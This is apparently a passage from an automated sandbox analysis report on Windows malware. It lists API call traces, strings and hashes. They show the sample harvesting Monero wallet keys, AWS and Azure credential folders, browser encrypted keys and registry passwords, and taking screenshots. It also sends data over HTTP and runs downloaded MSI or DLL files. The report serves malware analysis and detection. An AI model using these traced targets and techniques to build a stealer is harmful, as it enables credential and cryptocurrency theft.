                              • InternetCloseHandle.WININET(00000000), ref: 00125FBD
                              • HttpOpenRequestA.WININET(00000000,00FFE898,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00125BF8
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • InternetCloseHandle.WININET(00000000), ref: 00125FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 38bbb121b363e328d9f2d56b0697b4b62e36ac1fb8a63b3dfec11d8e3aa67f13
                              • Instruction ID: ff9e53a1e0b2273480f5959400d743e29934e991a2686417d529c0652d034235
                              • Opcode Fuzzy Hash: 38bbb121b363e328d9f2d56b0697b4b62e36ac1fb8a63b3dfec11d8e3aa67f13
                              • Instruction Fuzzy Hash: 7E12DC72860128ABDB15EBA0DCA5FEEB378BF24701F904199F14673091EF706A49CF65
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0012D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0012D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D208
                              • lstrcat.KERNEL32(?,00141478), ref: 0012D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D22A
                              • lstrcat.KERNEL32(?,0014147C), ref: 0012D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D24C
                              • lstrcat.KERNEL32(?,00141480), ref: 0012D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D26E
                              • lstrcat.KERNEL32(?,00141484), ref: 0012D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D290
                              • lstrcat.KERNEL32(?,00141488), ref: 0012D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D2B2
                              • lstrcat.KERNEL32(?,0014148C), ref: 0012D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D2D4
                              • lstrcat.KERNEL32(?,00141490), ref: 0012D2E3
                                • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                                • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                              • lstrlen.KERNEL32(?), ref: 0012D32A
                              • lstrlen.KERNEL32(?), ref: 0012D339
                                • Part of subcall function 0013AA70: StrCmpCA.SHLWAPI(00FF9218,0012A7A7,?,0012A7A7,00FF9218), ref: 0013AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0012D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 3a1e2fdfd8a44aa6243702b3291a2cc6ebb527c6ac72d123fbf73d8b2b4c881c
                              • Instruction ID: d01ebe2cdd5911b3690af7d493097d02abdf91301b1a676af3b697962b0fbd2d
                              • Opcode Fuzzy Hash: 3a1e2fdfd8a44aa6243702b3291a2cc6ebb527c6ac72d123fbf73d8b2b4c881c
                              • Instruction Fuzzy Hash: 77E10A72910118ABCB05EBA0DD96EEE777CBF24301F904158F146B70A1DF75AA09CFA2
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FFD2A8,00000000,?,0014144C,00000000,?,?), ref: 0012CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0012CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0012CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0012CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0012CAD9
                              • StrStrA.SHLWAPI(?,00FFD338,00140B52), ref: 0012CAF7
                              • StrStrA.SHLWAPI(00000000,00FFD350), ref: 0012CB1E
                              • StrStrA.SHLWAPI(?,00FFD740,00000000,?,00141458,00000000,?,00000000,00000000,?,00FF91E8,00000000,?,00141454,00000000,?), ref: 0012CCA2
                              • StrStrA.SHLWAPI(00000000,00FFD960), ref: 0012CCB9
                                • Part of subcall function 0012C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                                • Part of subcall function 0012C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                              • StrStrA.SHLWAPI(?,00FFD960,00000000,?,0014145C,00000000,?,00000000,00FF9208), ref: 0012CD5A
                              • StrStrA.SHLWAPI(00000000,00FF8F58), ref: 0012CD71
                                • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                                • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                                • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                              • lstrlen.KERNEL32(00000000), ref: 0012CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0012CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 1cb01d1f31436fdc5f8660c93b3ffe31201d5e611589b9b4e18b87e53d8d5a3b
                              • Instruction ID: 46c1ef07c9bcc93dd0198b71dbffb313fafe721a4e4bb994a3f27972a63a8ce8
                              • Opcode Fuzzy Hash: 1cb01d1f31436fdc5f8660c93b3ffe31201d5e611589b9b4e18b87e53d8d5a3b
                              • Instruction Fuzzy Hash: A1E1F071D10108ABDB15EBA4DC96FEEB778AF24301F804199F14677191EF706A4ACFA2
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • RegOpenKeyExA.ADVAPI32(00000000,00FFB048,00000000,00020019,00000000,001405B6), ref: 001383A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                              • wsprintfA.USER32 ref: 00138459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                              • Instruction ID: eee742040809c0b4afcfe97b96a7b9aa48e541a1c39b4360b6a9458f7f92d774
                              • Opcode Fuzzy Hash: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                              • Instruction Fuzzy Hash: DB810CB1910218ABEB25DB50CC95FEA77B8FF58700F4082D9F149A6140DF716B85CF95
                              APIs
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00134DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00134DCD
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                                • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                              • lstrcat.KERNEL32(?,00000000), ref: 00134E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00134E59
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                                • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                                • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00134EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00134EE5
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349B0
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,001408D2), ref: 001349C5
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349E2
                                • Part of subcall function 00134910: PathMatchSpecA.SHLWAPI(?,?), ref: 00134A1E
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,00FFE868), ref: 00134A4A
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FF8), ref: 00134A5C
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A70
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FFC), ref: 00134A82
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A96
                                • Part of subcall function 00134910: CopyFileA.KERNEL32(?,?,00000001), ref: 00134AAC
                                • Part of subcall function 00134910: DeleteFileA.KERNEL32(?), ref: 00134B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: b7aff281511ef767900da30062ee049d1446a011c76ce7454afbf98c57c47534
                              • Instruction ID: a170f70e61b3af4a3f9500c36135c1f2c83874b342e43ab0b83c429343d75912
                              • Opcode Fuzzy Hash: b7aff281511ef767900da30062ee049d1446a011c76ce7454afbf98c57c47534
                              • Instruction Fuzzy Hash: C2415EBA94021877DB10E760EC47FED7638AB64705F404494B689670C1EFB5ABC98B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                              • Instruction ID: 13f6a21c044cfa3b440a498bbae8310b8a7aefe1cddacb8c5fc895cdcfa2cd26
                              • Opcode Fuzzy Hash: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                              • Instruction Fuzzy Hash: 7171B9B5910608ABDB04EBE4DD89FEEBBBDBF58700F108508F516A7290DB74A905CF61
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001331C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0013335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001334EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                              • Instruction ID: 3f35fb74d10c0c8d3918694629b5059df213c85233108eff23360af54a110ac9
                              • Opcode Fuzzy Hash: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                              • Instruction Fuzzy Hash: 9C121371850108AADB19FBA0DC92FEDB778AF24301F904199F54776191EF742B4ACFA2
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                                • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126303
                                • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                                • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385
                                • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                                • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                              • lstrlen.KERNEL32(00000000), ref: 0013532F
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                              • lstrlen.KERNEL32(00000000), ref: 00135383
                              • lstrlen.KERNEL32(00000000), ref: 001353AE
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: a9e91660e016a63701fad18b67f27f12f44f7d0c9413271f26df06ab513eb6e7
                              • Instruction ID: 637043151c5a8c33d39e444134803f063b43894a9964485b1db52e6b86fd77b3
                              • Opcode Fuzzy Hash: a9e91660e016a63701fad18b67f27f12f44f7d0c9413271f26df06ab513eb6e7
                              • Instruction Fuzzy Hash: A3510F70910148EBDB18FF60DD96AED7779AF20301F904068F446AB592EF346B46DBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 004c91f5657803e5f0111111125ddb86ac7490bb69cba08bc29b74f813a7e255
                              • Instruction ID: 8a04c54d0eb63e25b77f526621672f2433e5ee8eaed746898ea52aa42f6a8a36
                              • Opcode Fuzzy Hash: 004c91f5657803e5f0111111125ddb86ac7490bb69cba08bc29b74f813a7e255
                              • Instruction Fuzzy Hash: CCC194B594021DABCB14EF60DC99FEA7378BF64304F1045D8F50AA7281EB70AA85DF91
                              APIs
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001342EC
                              • lstrcat.KERNEL32(?,00FFDEA0), ref: 0013430B
                              • lstrcat.KERNEL32(?,?), ref: 0013431F
                              • lstrcat.KERNEL32(?,00FFD3C8), ref: 00134333
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                                • Part of subcall function 00129CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 001393C0: GlobalAlloc.KERNEL32(00000000,001343DD,001343DD), ref: 001393D3
                              • StrStrA.SHLWAPI(?,00FFE0C8), ref: 001343F3
                              • GlobalFree.KERNEL32(?), ref: 00134512
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                                • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                                • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001344A3
                              • StrCmpCA.SHLWAPI(?,001408D1), ref: 001344C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001344D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001344E5
                              • lstrcat.KERNEL32(00000000,00140FB8), ref: 001344F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: e000a48c117d63e07e7df58269cdb64fab0dace77f003b805f7078bfa8e8db35
                              • Instruction ID: 6a4dba339893330887829d1656ed37dcffdfc684f7c4c7fe86dd0577581a0165
                              • Opcode Fuzzy Hash: e000a48c117d63e07e7df58269cdb64fab0dace77f003b805f7078bfa8e8db35
                              • Instruction Fuzzy Hash: 8A7167B6900218ABCB14EBA0DC85FEE777DAF98300F008598F605A7181DB75EB55CF91
                              APIs
                                • Part of subcall function 001212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                                • Part of subcall function 001212A0: RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                                • Part of subcall function 001212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                                • Part of subcall function 001212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                                • Part of subcall function 001212A0: RegCloseKey.ADVAPI32(?), ref: 001212FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0012134F
                              • lstrlen.KERNEL32(?), ref: 0012135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00121377
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00121465
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001214EF
                               Memory Dump Source
                               • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: eb4c93b98624ea71bbd5c9f80c581ae6c81fe52072c03e0ee77d765a6e853d98
                              • Instruction ID: f8d9c40368e83098f8cd6615f74a0238dfecc341fc23514d8c5d71352fc324cd
                              • Opcode Fuzzy Hash: eb4c93b98624ea71bbd5c9f80c581ae6c81fe52072c03e0ee77d765a6e853d98
                              • Instruction Fuzzy Hash: E55122B195011867CB15EB60DD92BED737CAF64300F8041D8B64A72091EF706B89CFA6
                              APIs
                                • Part of subcall function 001272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                                • Part of subcall function 001272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                                • Part of subcall function 001272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                                • Part of subcall function 001272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                                • Part of subcall function 001272D0: HeapFree.KERNEL32(00000000), ref: 00127459
                              • lstrcat.KERNEL32(00000000,001417FC), ref: 00127606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00127648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0012765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0012768F
                              • lstrcat.KERNEL32(00000000,00141804), ref: 001276A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001276D3
                              • lstrcat.KERNEL32(00000000,00141808), ref: 001276ED
                              • task.LIBCPMTD ref: 001276FB
                               Memory Dump Source
                               • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
